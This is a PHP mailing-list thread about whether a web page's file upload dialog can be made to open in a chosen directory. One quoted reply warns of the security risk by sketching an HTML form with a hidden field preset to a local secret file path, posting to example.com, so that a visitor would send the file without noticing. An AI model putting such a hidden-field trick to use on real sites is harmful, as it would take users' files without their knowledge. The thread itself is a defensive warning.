are you sure it was not internet explorer just showing you the last
directory you had opened with a 'browse...' button with in that browsing
session?
Jay Blanchard wrote:
[snip]
Along these same lines, does anyone know how to make the file dialog
start
in a specific directory? I saw this the other day but forgot where. I
clicked browse and the dialog popped up pointed to My Pictures (which
at
least works for most Windblows users). I meant to look at the code,
but
didn't....
Yikes!
If it *DOES* work, you've probably got yet another security problem in
Windows.
Suppose, for example, that I do something like this:
<form action="http://example.com/"; method="post"
enctype="multipart/form-data">
<input style="visibility: hidden" name="steal"
value="C:\path\to\commonly\used\secret\file\I\should\not\get.secret">
What's your name? <input name="name"><br />
Who's your daddy? <input name="daddy"><br />
<input type="submit">
</form>
Now, the unsuspecting user will be HANDING me the file I shouldn't
have without ever seeing anything about it.
Even if it "only" lets you pick the directory, but not the file, it
probably exposes too much information about my desktop for my tastes.
[/snip]
Now I need to go back and find it. It was a site having to do with photos,
but I was doing research and visited a lot of them. Since the upload dialog
was looking for photos you can see where the apparent convenience could come
in. But you're right....as a security hole it is big enough for aircrafy
carrier usage.
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
